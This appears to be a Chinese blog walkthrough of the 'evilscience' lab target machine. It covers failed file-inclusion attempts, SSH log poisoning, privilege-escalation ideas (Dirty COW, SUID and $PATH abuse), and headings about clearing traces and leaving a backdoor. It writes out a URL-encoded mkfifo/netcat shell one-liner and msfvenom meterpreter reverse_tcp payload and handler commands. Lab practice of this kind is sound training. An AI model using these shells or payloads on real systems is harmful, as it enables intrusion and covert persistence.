靶机记录(十二):evilscience
作者:互联网
目录
主机发现
端口扫描
SSH尝试连接
Web渗透
漏洞挖掘
试试其他的路径 :
/var/log/apache2/access.log
/var/log/apache/access.log -----WEB 日志文件
/var/www/log/access.log
全失败
尝试读取以下配置文件 :
/etc/apache2/apache2.conf 失败
尝试伪协议读取:
file=php://filter/convert.base64-encode/resource=index.php 失败
PHP伪协议读取试试也是失败的
由于开了22,80,web日志不行,看一下 SSH 日志
GetShell
法一
依次执行
mkfifo /tmp/t
编码:mkfifo+/tmp/t
cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t
编码:cat+/tmp/t+|+/bin/sh+-i+2>%261+|+nc%20-l+1234+>+/tmp/t;
法二(MSF)
生成木马脚本:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机上的端口 -f elf > GetShell.elf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 攻击机IP
set lport 攻击机端口号
run
提权
法一(失败了)
在靶机上下载后 解析的时候都失败了 -> 啥也不是
法二(脏牛,也失败了。。)
法三
这个文件 而这个文件是具有s权限的
!!有的S标志位文件可写,有的不可写但是可以执行通过管道符一并执行我们的马,有的不可写但是可以调用,通过伪造同样文件名来执行eg:$PATH
法四
法五
flag
清痕迹,留后门
标签:tmp,log,攻击机,十二,法二,失败,evilscience,靶机,法一 来源: https://blog.csdn.net/weixin_47306547/article/details/121056248